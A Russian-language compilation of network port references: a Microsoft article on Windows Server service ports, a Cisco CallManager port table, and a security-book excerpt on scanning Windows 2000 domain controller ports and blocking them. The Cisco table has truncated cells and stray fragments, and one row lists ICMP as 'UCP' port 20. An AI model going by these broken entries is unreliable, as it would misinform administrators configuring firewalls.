Обозреватель компьютеров используется на компьютерах под управлением операционных систем Windows для просмотра сетевых доменов и ресурсов. Компьютеры, которые выступают в роли обозревателей, составляют списки просмотра, содержащие все общие ресурсы сети. Функции просмотра необходимы таким средствам ОС Windows более ранних версий, как «Сетевое окружение», команде net view и проводнику Windows. Так, если открыть «Сетевое окружение» на компьютере под управлением Windows 95, появится список доменов и компьютеров. Для его составления компьютер получает копию списка просмотра у компьютера, который исполняет роль обозревателя.Имя системной службы: Обозреватель
| Прикладной протокол | Протокол | Порты |
| Служба датаграмм NetBIOS | UDP | 138 |
| Разрешение имен NetBIOS | UDP | 137 |
| Служба сеансов NetBIOS | TCP | 139 |
Служба DHCP-сервера
Служба DHCP-сервера использует протокол DHCP (Dynamic Host Configuration Protocol) для автоматического распределения IP-адресов.
С ее помощью можно настроить дополнительные сетевые параметры DHCP-клиентов, например серверы служб DNS (Domain Name System) и WINS (Windows Internet Name Service). Для хранения и передачи на клиентские компьютеры сведений о конфигурации TCP/IP можно настроить один или несколько DHCP-серверов.Имя системной службы: DHCPServer
| Прикладной протокол | Протокол | Порты |
| DHCP-сервер | UDP | 67 |
| MADCAP | UDP | 2535 |
Распределенная файловая система
Служба распределенной файловой системы (DFS) объединяет разноправные общие файловые ресурсы, которые распределены на серверах локальной (LAN) или глобальной (WAN) сети, в одном логическом пространстве имен. Служба необходима контроллерам домена Active Directory для объявления общей папки SYSVOL.Имя системной службы: Dfs
| Прикладной протокол | Протокол | Порты |
| Служба датаграмм NetBIOS | UDP | 138 |
| Служба сеансов NetBIOS | TCP | 139 |
| Сервер LDAP | TCP | 389 |
| Сервер LDAP | UDP | 389 |
| SMB | TCP | 445 |
| RPC | TCP | 135 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
Сервер отслеживания изменившихся связей
Служба сервера отслеживания изменившихся связей хранит сведения о перемещении файлов между томами в домене.
Служба запущена на каждом контроллере домена и позволяет службе клиента отслеживания изменившихся связей отслеживать связанные документы, перемещенные на другой том с файловой системой NTFS в том же домене.Имя системной службы: TrkSvr
| Прикладной протокол | Протокол | Порты |
| RPC | TCP | 135 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
Координатор распределенных транзакций
Системная служба координатора распределенных транзакций (DTC) отвечает за координацию транзакций, распределенных в нескольких системах и диспетчерах ресурсов, например базах данных, очередях сообщений, файловых системах и других диспетчерах ресурсов с защитой транзакций. Служба DTC используется, если компоненты транзакций настраиваются через СОМ+, а также очередями сообщений (MSMQ) и в операциях SQL Server, которые охватывают несколько систем.
Имя системной службы: MSDTC
| Прикладной протокол | Протокол | Порты |
| RPC | TCP | 135 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
DNS-сервер
Служба DNS-сервера предназначена для разрешения имен DNS путем ответа на запросы на предоставление и обновление имен DNS. Серверы DNS необходимы для обнаружения устройств и служб, идентификация которых происходит по именам DNS, а также контроллеров домена в Active Directory.Имя системной службы: DNS
| Прикладной протокол | Протокол | Порты |
| DNS | UDP | 53 |
| DNS | TCP | 53 |
Журнал событий
Системная служба журнала событий регистрирует сообщения о событиях, полученные от программ и операционной системы Windows.
Отчеты службы содержат сведения, которые используются в процессе диагностики возникающих неполадок. Для просмотра отчетов служит программа «Просмотр событий». Сообщения, полученные от программ, других служб и операционной системы, регистрируются в файлах журналов событий. Такие сообщения содержат диагностические сведения, а также ошибки, которые различаются в зависимости от программы, службы или компонента, являющегося источником возникновения события. Просмотреть журналы можно средствами программирования через соответствующие интерфейсы API, а также с помощью программы «Просмотр событий» из состава консоли управления ММС.Имя системной службы: Eventlog
| Прикладной протокол | Протокол | Порты |
| RPC | TCP | 135 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
Exchange Server и клиенты Outlook
Используемые порты и протоколы зависят от версии установленного сервера Microsoft Exchange или клиента Exchange.
Клиенты Outlook подключаются к серверам Exchange более ранних версий, чем Exchange 2003, напрямую через службу RPC. Вначале происходит обращение к службе отображения конечных точек RPC (ТСР-порт 135) для получения сведений о сопоставлении портов для необходимых конечных точек. Затем клиент Outlook пытается подключиться к серверу Exchange непосредственно через эти конечные точки.
В процессе обмена данными с клиентскими компьютерами сервером Exchange 5.5 используется два порта: один для службы банка сообщений, а второй для каталога. Exchange 2000 Server и Exchange Server 2003 используют три порта: один для службы банка сообщений, второй для Directory Referral (RFR), а третий для DSProxy/NSPI.
В большинстве случаев эти порты (два или три) произвольно назначаются в диапазоне от 1024 до 65534, но при необходимости можно настроить для них статическое сопоставление номеров.
Дополнительные сведения о настройке статических портов TCP/IP в Exchange Server см. в следующей статье базы знаний Майкрософт:
http://support.
microsoft.com/kb/270836/ — Статическое сопоставление портов для Exchange Server (эта ссылка может указывать на содержимое полностью или частично на английском языке)
Клиенты Outlook 2003 поддерживают прямое подключение к серверам Exchange с помощью удаленного вызова процедур. Кроме того, такие клиенты могут взаимодействовать с серверами Exchange 2003 на компьютерах под управлением Windows Server 2003 в Интернете. Обмен данными между клиентом Outlook и сервером Exchange с помощью RPC по протоколу HTTP позволяет избежать необходимости открытой пересылки непроверенного RPC-трафика через Интернет. Вместо этого трафик между клиентом Outlook 2003 и компьютером Exchange Server 2003 заключается в пакеты HTTPS и передается через TCP-порт 443 (HTTPS).
В случае применения удаленного вызова процедур по протоколу HTTP необходимо, чтобы был доступен TCP-порт 443 (HTTPS) между клиентом Outlook 2003 и сервером, который выступает в качестве устройства RPCProxy. Пакеты HTTPS поступают на сервер RPCProxy, а затем пакеты RPC в развернутом виде передаются на три порта сервера Exchange подобно тому, как это происходит при прямом подключении по протоколу RPC (см.
выше). Протоколу RPC по HTTP на сервере Exchange статически назначены TCP-порты 6001 (служба банка сообщений), 6002 (Directory Referral) и 6004 (DSProxy/NSPI). При обмене данными между Outlook 2003 и сервером Exchange 2003 с помощью RPC по протоколу HTTP служба отображения конечных точек не нужна, поскольку Outlook 2003 известны статически назначенные порты конечных точек. Кроме того, клиенту Outlook 2003 не требуется и доступ к глобальному каталогу, его функции выполняет интерфейс DSProxy/NSPI на сервере Exchange 2003.
Exchange Server поддерживает и другие протоколы, например SMTP, POP3 (Post Office Protocol 3) и IMAP.
| Прикладной протокол | Протокол | Порты |
| IMAP | TCP | 143 |
| IMAP по SSL | TCP | 993 |
| POP3 | TCP | 110 |
| POP3 по SSL | TCP | 995 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
| RPC | TCP | 135 |
| RPC по HTTP | TCP | 443 |
| SMTP | TCP | 25 |
| SMTP | UDP | 25 |
| Служба банка сообщений | TCP | 6001 |
| Directory Referral | TCP | 6002 |
| DSProxy/NSPI | TCP | 6004 |
Служба факсов
Служба факсов (совместимая с интерфейсом TAPI системная служба) предназначена для поддержки функций факсов.
С ее помощью пользователи могут принимать и отправлять факсы из прикладных программ, используя локальные или общие сетевые устройства.Имя системной службы: Fax
| Прикладной протокол | Протокол | Порты |
| Служба сеансов NetBIOS | TCP | 139 |
| RPC | TCP | 135 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
| SMB | TCP | 445 |
Репликация файлов
Служба репликации файлов (FRS) автоматически копирует обновления файлов и папок между компьютерами, участвующими в одном наборе репликации FRS. FRS — это стандартный модуль репликации, задачей которого является репликация общей папки SYSVOL между контроллерами домена под управлением Windows 2000 и Windows Server 2003 в составе одного домена. Кроме того, службу можно настроить на выполнение репликации файлов и папок между целевыми объектами корня или ссылки DFS с помощью средства администрирования DFS.
Имя системной службы: NtFrs
| Прикладной протокол | Протокол | Порты |
| RPC | TCP | 135 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
Файловый сервер для Macintosh
Системная служба файлового сервера для Macintosh позволяет пользователям компьютеров Macintosh хранить и получать доступ к файлам на компьютерах под управлением Windows Server 2003. Если служба выключена или заблокирована, клиенты Macintosh не могут хранить и получить доступ к файлам на таком компьютере.Имя системной службы: MacFile
| Прикладной протокол | Протокол | Порты |
| Файловый сервер для Macintosh | TCP | 548 |
Служба публикации FTP
Служба публикации FTP используется для установки подключений к FTP-серверам. Контрольный FTP-порт по умолчанию – 21, однако эту службу можно настроить с помощью диспетчера служб IIS. Порт данных по умолчанию (используется для FTP активного режима) автоматически устанавливается на единицу меньшим, чем контрольный порт. Таким образом, если 4131 – это контрольный порт, то 4130 будет портом данных по умолчанию. Большинство клиентов FTP используют FTP пассивного режима. Это значит, что клиент подключается к FTP-серверу через контрольный порт, FTP-сервер назначает ТСР-порт с большим номером в диапазоне от 1025 до 5000, а затем клиент открывает второе подключение к FTP-серверу для передачи данных. Диапазон портов с большими номерами можно настроить с помощью метабазы IIS.Имя системной службы: MSFTPSVC
| Прикладной протокол | Протокол | Порты |
| Управление FTP | TCP | 21 |
| Данные по умолчанию FTP | TCP | 20 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
Групповая политика
Для успешного применения групповой политики клиент должен иметь возможность подключения к контроллеру домена по протоколам DCOM, ICMP, LDAP, SMB и RPC.
Если любой из этих протоколов недоступен или заблокирован для подключения клиента к соответствующему контроллеру домена, то политика не будет применяться или обновляться. В случае междоменного входа в систему (когда компьютер и учетная запись пользователя принадлежат разным доменам) эти протоколы могут потребоваться для обмена данными между клиентом, доменом ресурсов и доменом учетной записи пользователя. С помощью протокола ICMP определяется медленный канал. Дополнительные сведения об определении медленного канала см. в следующей статье базы знаний Майкрософт: 227260 (http://support.microsoft.com/kb/227260/) Определение медленного канала для обработки профилей пользователей и групповой политики (эта ссылка может указывать на содержимое полностью или частично на английском языке) Имя системной службы: Групповая политика| Прикладной протокол | Протокол | Порты |
| DCOM | TCP + UDP | произвольный номер порта в диапазоне 1024 – 65534 |
| ICMP (ping) | UCP | 20 |
| LDAP | TCP | 389 |
| SMB | TCP | 445 |
| RPC | TCP | 135, произвольный номер порта в диапазоне 1024 – 65534 |
HTTP SSL
Системная служба HTTP SSL позволяет службам IIS выполнять функции протокола SSL (SSL – это открытый стандарт, который служит для установки каналов обмена зашифрованными данными с целью предотвращения перехвата важной информации, например номеров кредитных карточек).
Несмотря на то что служба предназначена для применения с другими службами Интернета, в основном она используется для проведения электронных транзакций в Интернете в зашифрованном виде. Порты ожидания для службы можно настроить с помощью диспетчера служб IIS.Имя системной службы: HTTPFilter
| Прикладной протокол | Протокол | Порты |
| HTTPS | TCP | 443 |
Служба проверки подлинности в Интернете
Служба проверки подлинности в Интернете (IAS) централизованно осуществляет проверку подлинности, авторизацию, аудит и учет пользователей, которые подключаются к сети (по локальной сети или с помощью удаленных подключений). Служба IAS реализована на основе стандартного протокола RADIUS (Remote Authentication Dial-In User Service) проблемной группы IETF.Имя системной службы: IAS
| Прикладной протокол | Протокол | Порты |
| Традиционный RADIUS | UDP | 1645 |
| Традиционный RADIUS | UDP | 1646 |
| Учет RADIUS | UDP | 1813 |
| Проверка подлинности RADIUS | UDP | 1812 |
Общий доступ к подключению Интернета (ICS)/брандмауэр подключения к Интернету (ICF)
Эта служба осуществляет преобразование сетевых адресов, адресацию и разрешение имен для всех компьютеров домашней или небольшой офисной сети.
Когда установлен общий доступ к подключению Интернета, компьютер становится «шлюзом», а другие клиентские компьютеры сети могут совместно использовать одно подключение к Интернету (например, подключение удаленного доступа или широкополосное соединение). Эта служба предоставляет базовые службы DHCP и DNS, а также поддерживает полнофункциональные службы DHCP и DNS из состава Windows. Если компьютер с включенным брандмауэром ICF и общим доступом к подключению Интернета выступает в роли шлюза для остальных компьютеров сети, то он предоставляет службы DHCP и DNS для частной сети на внутреннем сетевом интерфейсе (но не на внешнем интерфейсе).Имя системной службы: SharedAccess
| Прикладной протокол | Протокол | Порты |
| DHCP-сервер | UDP | 67 |
| DNS | UDP | 53 |
| DNS | TCP | 53 |
Центр распространения ключей Kerberos
Если применяется системная служба центра распространения ключей Kerberos (KDC), пользователи могут входить в сеть с помощью протокола проверки подлинности Kerberos 5.
Как и в других версиях протокола Kerberos, KDC – это один процесс, обеспечивающий службы проверки подлинности и выдачи билетов. Служба проверки подлинности выпускает билеты на выдачу билета, а служба выдачи билетов – билеты для подключения к компьютерам в своем домене.Имя системной службы: kdc
| Прикладной протокол | Протокол | Порты |
| Kerberos; | TCP | 88 |
| Kerberos; | UDP | 88 |
Учет лицензий
Системная служба учета лицензий первоначально предназначалась для управления лицензиями серверных продуктов Майкрософт, которые лицензируются по модели Server CAL (Client Access License, клиентская лицензия на доступ). Учет лицензий был введен в Microsoft Windows NT Server 3.51. По умолчанию служба учета лицензий в Windows Server 2003 отключена. Из-за изменяющихся условий лицензирования, а также ограничений в исходной архитектуре служба учета лицензий не всегда составляет точную картину общего числа приобретенных лицензий CAL в сравнении с общим числом лицензий CAL, которые используются на определенном сервере или предприятии.
Отчет службы учета лицензий может противоречить условиям лицензионных соглашений и правам на использование продукта. Служба учета лицензий будет исключена из будущих версий операционных систем Windows. Корпорация Майкрософт рекомендует включать эту службу только пользователям операционных систем семейства Microsoft Small Business Server.Имя системной службы: LicenseService
| Прикладной протокол | Протокол | Порты |
| Служба датаграмм NetBIOS | UDP | 138 |
| Служба сеансов NetBIOS | TCP | 139 |
| SMB | TCP | 445 |
Очередь сообщений
Системная служба очереди сообщений представляет собой инфраструктуру и средство разработки распределенных программ для обмена сообщениями в Windows. Такие программы способны осуществлять обмен данными между неоднородными сетями и отправлять сообщения между компьютерами, которые временно не могут установить подключение друг к другу.
Служба очереди сообщений обеспечивает безопасность, эффективную маршрутизацию, поддержку отправки сообщений внутри транзакций, приоритетную отправку, а также гарантированную доставку сообщений.Имя системной службы: MSMQ
| Прикладной протокол | Протокол | Порты |
| MSMQ | TCP | 1801 |
| MSMQ | UDP | 1801 |
| MSMQ-DCs | TCP | 2101 |
| MSMQ-Mgmt | TCP | 2107 |
| MSMQ-Ping | UDP | 3527 |
| MSMQ-RPC | TCP | 2105 |
| MSMQ-RPC | TCP | 2103 |
| RPC | TCP | 135 |
Служба сообщений
Системная служба сообщений принимает и отправляет сообщения пользователей, компьютеров, администраторов и службы оповещения. Эта служба не имеет отношения к программе Windows Messenger. Если отключить службу сообщений, зарегистрировавшиеся на данный момент времени в сети компьютеры и пользователи не будут получать отправленных им уведомлений.
Кроме того, перестают функционировать команды net send и net name.Имя системной службы: Messenger
| Прикладной протокол | Протокол | Порты |
| Служба датаграмм NetBIOS | UDP | 138 |
Стеки пересылки сообщений Microsoft Exchange
В Exchange 2000 Server и Exchange Server 2003 агент пересылки сообщений (MTA) часто используется для обеспечения обратно-совместимых служб пересылки сообщений между серверами Exchange 2000 Server и Exchange Server 5.5 в смешанной среде.Имя системной службы: MSExchangeMTA
| Прикладной протокол | Протокол | Порты |
| X.400 | TCP | 102 |
Microsoft Operations Manager 2000
Приложение Microsoft Operations Manager (MOM) 2000 позволяет управлять операциями на уровне предприятия, включая всестороннее управление событиями, активный мониторинг, отправку оповещений, составление отчетов и анализ тенденций развития.
После установки пакета обновлений 1 (SP1) приложение MOM 2000 прекращает обмен данными в формате обычного текста, а весь трафик между агентом и сервером MOM шифруется через TCP-порт 1270. Для подключения к серверу консоль администратора MOM использует модель DCOM, т. е. администратор, осуществляющий управление сервером МОМ по сети, должен иметь доступ к произвольно назначенным ТСР-портам с большими номерами.Имя системной службы: one point
| Прикладной протокол | Протокол | Порты |
| MOM-Clear | TCP | 51515 |
| MOM-Encrypted | TCP | 1270 |
Служба Microsoft POP3
Служба Microsoft POP3 предназначена для обмена сообщениями электронной почты, а также их поиска. Служба может использоваться для хранения и управления учетными записями электронной почты на почтовом сервере. Когда на почтовом сервере установлена служба Microsoft POP3, пользователи создают подключение, а затем производят поиск сообщений с помощью почтового клиента с поддержкой протокола РОР3, например Microsoft Outlook.
Имя системной службы: POP3SVC
| Прикладной протокол | Протокол | Порты |
| POP3 | TCP | 110 |
MSSQLSERVER
MSSQLSERVER – это системная служба из состава Microsoft SQL Server 2000. Сервер SQL Server представляет собой мощную, комплексную платформу управления данными. Порты, которые используются каждым экземпляром SQL Server, настраиваются с помощью средства Server Network Utility.Имя системной службы: MSSQLSERVER
| Прикладной протокол | Протокол | Порты |
| SQL по TCP | TCP | 1433 |
| SQL Probe | UDP | 1434 |
MSSQL$UDDI
Системная служба MSSQL$UDDI устанавливается одновременно с функцией UDDI (Universal Description, Discovery and Integration) операционных систем семейства Windows Server 2003 и служит для поддержки этой функции в рамках предприятия.
Ключевым компонентом службы MSSQL$UDDI является модуль базы данных SQL Server.Имя системной службы: MSSQLSERVER
| Прикладной протокол | Протокол | Порты |
| SQL по TCP | TCP | 1433 |
| SQL Probe | UDP | 1434 |
Net Logon
Для проверки подлинности пользователей и служб системная служба Net Logon поддерживает безопасный канал между компьютером и контроллером домена. Она передает на контроллер домена учетные данные пользователя, а возвращает доменные идентификаторы безопасности и назначенные пользователю права. Обычно этот процесс называется сквозной проверкой подлинности. Служба Net Logon автоматически запускается, только когда к домену подключается рядовой компьютер или контроллер домена. В операционных системах семейств Windows 2000 Server и Windows Server 2003 служба Net Logon публикует записи ресурсов в базе данных DNS. В процессе ожидания входящих запросов служба зависит от служб локального администратора безопасности и сервера.
На компьютерах в составе домена служба Net Logon использует удаленный вызов процедур по именованным каналам. На контроллерах домена используются удаленный вызов процедур по именованным каналам, удаленный вызов процедур по протоколу TCP/IP, слоты сообщений и Облегченный протокол доступа к каталогам (LDAP).Имя системной службы: Netlogon
| Прикладной протокол | Протокол | Порты |
| Служба датаграмм NetBIOS | UDP | 138 |
| Разрешение имен NetBIOS | UDP | 137 |
| Служба сеансов NetBIOS | TCP | 139 |
| SMB | TCP | 445 |
Общий доступ к рабочему столу NetMeeting
Системная служба общего доступа к рабочему столу NetMeeting позволяет прошедшим проверку пользователям удаленно управлять рабочим столом Windows с помощью программы Windows NetMeeting с другого компьютера по внутренней сети предприятия.
Службу необходимо явно включить в NetMeeting, а для отключения или закрытия предназначен значок в области уведомлений Windows.Имя системной службы: mnmsrvc
| Прикладной протокол | Протокол | Порты |
| Службы терминалов | TCP | 3389 |
Протокол NNTP (Network News Transfer Protocol)
Системная служба протокола NNTP позволяет компьютерам под управлением Windows Server 2003 выступать в роли сервера новостей. Для загрузки групп новостей с сервера, просмотра заголовков и чтения статей в каждой группе используется программа новостей, например Microsoft Outlook Express.Имя системной службы: NNTPSVC
| Прикладной протокол | Протокол | Порты |
| NNTP | TCP | 119 |
| NNTP по SSL | TCP | 563 |
Журналы и оповещения производительности
Системная служба журналов и оповещений производительности по заранее определенному графику собирает данные о производительности на локальном и удаленных компьютерах, а затем заносит их в журнал или использует для создания сообщения.
В зависимости от значения параметра сбора именованных журналов служба запускает или останавливает каждый именованный сбор данных о производительности. Служба запускается только в том случае, если запланирован хотя бы один сбор данных о производительности.Имя системной службы: SysmonLog
| Прикладной протокол | Протокол | Порты |
| Служба сеансов NetBIOS | TCP | 139 |
Диспетчер печати
Системная служба диспетчера печати управляет всеми локальными и сетевыми очередями печати, а также контролирует все задания печати. Диспетчер печати является ключевым компонентом системы печати в Windows. Он управляет очередями печати в системе, а также взаимодействует с драйверами принтеров и компонентами ввода-вывода, например USB-портами и протоколами семейства TCP/IP.Имя системной службы: Spooler
| Прикладной протокол | Протокол | Порты |
| Служба сеансов NetBIOS | TCP | 139 |
| SMB | TCP | 445 |
Удаленная установка
Системная служба удаленной установки используется для установки Windows 2000, Windows XP и Windows Server 2003 на клиентских компьютерах с PXE (Pre-Boot eXecution Environment), которые поддерживают удаленную загрузку.
Основной компонент сервера удаленной установки (RIS) – служба уровня согласования информации загрузки (Boot Information Negotiation Layer, BINL) – отвечает на запросы клиентов РХЕ, проверяет по Active Directory подлинность клиентов, а также осуществляет обмен данными между клиентом и сервером. Служба BINL устанавливается, когда с помощью средства «Установка компонентов Windows» добавляется сервер RIS, а также может быть выбрана в процессе исходной установки операционной системы.Имя системной службы: BINLSVC
| Прикладной протокол | Протокол | Порты |
| BINL | UDP | 4011 |
Удаленный вызов процедур (RPC)
Системная служба удаленного вызова процедур (RPC) представляет собой механизм взаимодействия между процессами (IPC), который позволяет осуществлять обмен данными и вызывать функции из других процессов. Другой процесс может быть запущен на локальном компьютере, в локальной сети или на удаленном компьютере; для получения доступа к нему используется подключение по глобальной (WAN) или виртуальной частной (VPN) сети.
Служба RPC выступает в роли службы отображения конечных точек RPC и диспетчера служб СОМ (Component Object Model). Служба удаленного вызова процедур необходима для запуска многих других служб.Имя системной службы: RpcSs
| Прикладной протокол | Протокол | Порты |
| RPC | TCP | 135 |
| RPC по HTTP | TCP | 593 |
Локатор удаленного вызова процедур (RPC)
Системная служба локатора удаленного вызова процедур управляет базой данных службы имен RPC. Служба должна быть включена, чтобы клиенты RPC могли находить серверы RPC. По умолчанию служба выключена.Имя системной службы: RpcLocator
| Прикладной протокол | Протокол | Порты |
| Служба сеансов NetBIOS | TCP | 139 |
| SMB | TCP | 445 |
Уведомления внешнего хранилища
Системная служба уведомлений внешнего хранилища отправляет уведомление пользователю, когда он осуществляет чтение или запись файла, который доступен только на дополнительном накопителе.
Если служба остановлена, отправка уведомлений прекращается.Имя системной службы: Remote_Storage_User_Link
| Прикладной протокол | Протокол | Порты |
| RPC | TCP | 135 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
Сервер внешнего хранилища
Системная служба сервера внешнего хранилища хранит редко используемые файлы на дополнительном накопителе. Если служба остановлена, переместить или извлечь файлы, которые расположены на дополнительном накопителе, невозможно.Имя системной службы: Remote_Storage_Server
| Прикладной протокол | Протокол | Порты |
| RPC | TCP | 135 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
Продолжение следует.
..
Источник — http://support.microsoft.com/kb/832017/ru
Авторизуйтесь для добавления комментариев!
Протокол | Удаленный исходящий порт | Порт назначения CallManager | Исходящий порт CallManager | Порт назначения удаленного устройства | Удаленные устройства | Примечания |
|---|---|---|---|---|---|---|
DTC | TCP 135 | Устройства CallManager в одном кластере | ||||
SSH | TCP 22 | Клиент Secure Shell | ||||
Telnet | TCP 23 | Клиент Telnet | ||||
DNS | UDP 53 | Серверы DNS | ||||
DHCP | UDP 68 | UDP 67 | Сервер DHCP | |||
DHCP | UDP 68 | UDP 67 | Клиент DHCP | |||
TFTP | UDP 69 | Динамические порты, используемые после первого подключения | ||||
HTTP | TCP 80 | Веб-браузеры администратора / пользователя | Страницы CCMAdmin и CCMUser | |||
OSI (DAP, DSP, DISP) | TCP или UDP 120 | Каталог DCD | ||||
NTP | UDP 123 | |||||
WINS | UDP 137-139 | Сервер WINS | Служба имен Интернет для Windows | |||
SNMP | UDP 161 | |||||
Сообщение SNMP | UDP 162 | |||||
LDAP | TCP 389 | TCP 389 | Службы каталога | При интегрировании с Corporate Directory | ||
HTTPS / SSL | TCP 443 | |||||
SMB | TCP 445 | TCP 445 | Несколько CallManager в одном кластере | |||
Syslog | TCP 514 | UDP 514 | Служба системного журнала | |||
RMI | TCP 1099-1129 | Служба RMI. | ||||
MS SQL | TCP 1433 | TCP 1433 | Несколько CallManager в одном кластере | |||
H.323 RAS | UDP 1718 | Обнаружение Привратника | ||||
H. | UDP 1719 | Привратник RAS | CallManager до версии 3.3. Cisco Conference Connection | |||
H.323 RAS | UDP 1024-4999 | UDP 1719 | Привратник RAS | CallManager версии 3. | ||
H.323 H.225 | TCP 1720 | TCP 1720 | Шлюзы H.323 / анонимное устройство Cisco Conference Connection / неуправляемая Привратником магистраль H.323 | |||
H.323 H.225/ICT | TCP 1024-4999 | Магистрали H. | CallManager версии 3.3 | |||
H.323 H.245 | TCP 1024-4999 | TCP 1024-4999 | Шлюзы H.323 CallManager / анонимное устройство / магистрали H.323 | |||
H.323 H.245 | TCP 11000-65535 | Шлюзы IOS H. | ||||
SCCP | TCP 2000 | Skinny-клиенты (IP-телефоны) | ||||
Skinny-шлюз (аналоговый) | TCP 2001 | Аналоговый Skinny-шлюз | Устарело | |||
Skinny-шлюз (цифровой) | TCP 2002 | Цифровой Skinny-шлюз | Устарело | |||
Управление MGCP | UDP 2427 | Управление шлюзом MGCP | ||||
Соединение с MGCP | TCP 2428 | Соединение со шлюзами MGCP | ||||
RTS Serv | 2500 | |||||
Cisco Extended Service | TCP 2551 | Определение активного / резервного | ||||
Cisco Extended Service | TCP 2552 | Уведомление об изменении DB | ||||
Сборщик данных RIS | TCP 2555 | Связь между RIS | ||||
Сборщик данных RIS | TCP 2556 | Используется клиентами (IIS) для связи с RIS | ||||
CTI/QBE | TCP 2748 | Приложения TAPI/JTAPI | Подключается к CTI Manager. | |||
Служба IPMA | TCP 2912 | Консоль помощника IPMA | ||||
Приложение потоковой передачи медиаинформации | UDP 3001 | Уведомление об изменении | ||||
SCCP | TCP 3224 | Медиаресурсы | Мосты для конференций / Xcoder | |||
Терминальные службы MS | TCP 3389 | Терминальные службы Windows | ||||
Агент HID Entercept | TCP 5000 | Консоль обнаружения несанкционированного доступа к хосту | ||||
CallManager SIP | TCP/UDP 5060 | TCP 5060 | Порт по умолчанию магистрали SIP | Может использовать TCP 1024 — 65535 | ||
Помощник VNC http | TCP 580x | Удаленное управление | ||||
VNC Display | TCP 690x | Дисплей компьютера виртуальной сети | Удаленное управление | |||
Уведомление об изменениях CallManager | TCP 7727 | Уведомление об изменении CallManager. | Уведомление об изменении RealTime | |||
Служба IPMA | TCP 8001 | IP Manager Assistant | Уведомление об изменении | |||
ICCS | TCP 8002 | TCP 8002 | Несколько CallManager в одном кластере | Внутрикластерная связь | ||
CTIM | TCP 8003 | |||||
Cisco Tomcat | TCP 8007 | Веб-запросы | ||||
Cisco Tomcat | TCP 8009 | Веб-запросы | ||||
Cisco Tomcat | TCP 8111 | IIS, веб-запросы рабочего потока IPMA | ||||
Cisco Tomcat | TCP 8222 | IIS, веб-запросы рабочего потока приложения EM | ||||
Cisco Tomcat | TCP 8333 | IIS, веб-запросы рабочего потока приложения WebDialer | ||||
DC Directory | TCP 8404 | Встроенные службы каталога | Используется для служб каталога. | |||
Cisco Tomcat | TCP 8444 | IIS, веб-запросы рабочего потока службы EM | ||||
Cisco Tomcat | TCP 8555 | IIS, веб-запросы рабочего потока Apache SOAP | ||||
Cisco Tomcat | TCP 8998 | Веб-запросы | ||||
Cisco Tomcat | TCP 9007 | IIS, веб-запросы рабочего потока CAR | ||||
RTP | UDP 16384-32767 | UDP 16384-32767 | Голосовое медиа | IP IVR Media. | ||
Агент Cisco SNMP | UDP 61441 | Интерфейс аварийных сигналов Cisco | Принимает некоторые аварийные сигналы SNMP в формате XML. |
Консоль оператора
323 RAS
3
323, управляемые Привратником CallManager
323 Cisco Conference Connection
Используется приложениями IVR, CCC, PA, Cisco Softphone, CRS, ICD, IPCC, IPMA, Attendant Console и любыми другими, которые используют TAPI или плагин J/TAPI / TSP.
Монитор уровня базы данных Cisco, Cisco TFTP, Cisco IP поток медиаданных, Cisco TCD, Cisco MOH
Аутентификация / настройка приложения. Журнал SoftPhone. Журнал пользователя.
CCC IVR Media, Cisco SoftPhone, приложение Media StreamingИллюстрированный самоучитель по защите в Интернет › Уязвимость Windows 2000 › Сканирование [страница — 135] | Самоучители по безопасности
Сканирование
Операционная система Windows 2000 прослушивает список портов, многие из которых не были задействованы в Windows NT 4 и появились лишь в этой версии операционной системы.
В табл. 6.1 приводится список некоторых портов, прослушиваемых по умолчанию контроллером домена Windows 2000. Каждый из них является потенциальной точкой входа в систему.
Список номеров портов TCP и UDP, используемых службами и программами компании Microsoft, можно найти в перечне ресурсов по адресу http://www.microsoft.com/windows2000/library/resouces/reslcit/samplechapters/default.asp.
Таблица 6.1. Список портов, прослушиваемых по умолчанию контроллером домена Windows 2000.
| Порт | Служба |
|---|---|
| TCP 25 | SMTP |
| TCP 21 | FTP |
| TCP/UDP 53 | DNS |
| TCP 80 | WWW |
| TCP/UDP 88 | Kerberos |
| TCP 135 | RPC/DCE Endpoint mapper |
| UDP 137 | Служба имен NetBIOS |
| UDP 138 | Служба дейтаграмм NetBIOS |
| TCP 139 | Служба сеансов NetBIOS |
| TCP/UDP 389 | LDAP |
| TCP 443 | HTTP поверх SSl/TLS |
| TCP/UDP 445 | Microsoft SMB/CIFS |
| TCP/UDP 464 | Kerberos kpasswd |
| UDP 500 | IKE (Internet Key Exchange) (согласно протоколу IPSec) |
| TCP 593 | HTTP RPC Endpoint mapper |
| TCP 636 | LDAP поверх SSLДLS |
| TCP 3268 | Глобальный каталог службы активных каталогов |
| TCP 3269 | Глобальный каталог службы активных каталогов поверх SSL |
| TCP 3389 | Терминальный сервер Windows |
Контрмеры: отключение служб и блокировка портов
Наилучший способ предотвращения всевозможных атак – это блокировка доступа к этим службам как на уровне сети, так и на уровне отдельных компьютеров.
Внешние устройства контроля доступа к сети (переключатели, маршрутизаторы, брандмауэры и т.д.) нужно сконфигурировать таким образом, чтобы пресечь любые попытки доступа извне ко всем указанным портам, (Обычно это делается следующим образом. Отключаются все протоколы для всех доменов, а затем подключаются только некоторые службы для избранных доменов.) При этом, конечно, необходимо помнить об очевидных исключениях: порт 80 или 443 нужно оставить для работы Web-серверов. Ни один из этих портов не должен быть доступен за пределами сети, и лишь некоторые могут предоставляться для использования проверенными пользователями внутренних подсетей. Особенно это касается контроллера домена. На это есть две причины.
- В главе 3 было показано, как можно подключиться к портам TCP 389 и TCP 3268 через службу LDAP и глобальный каталог соответственно и получить данные с сервера.
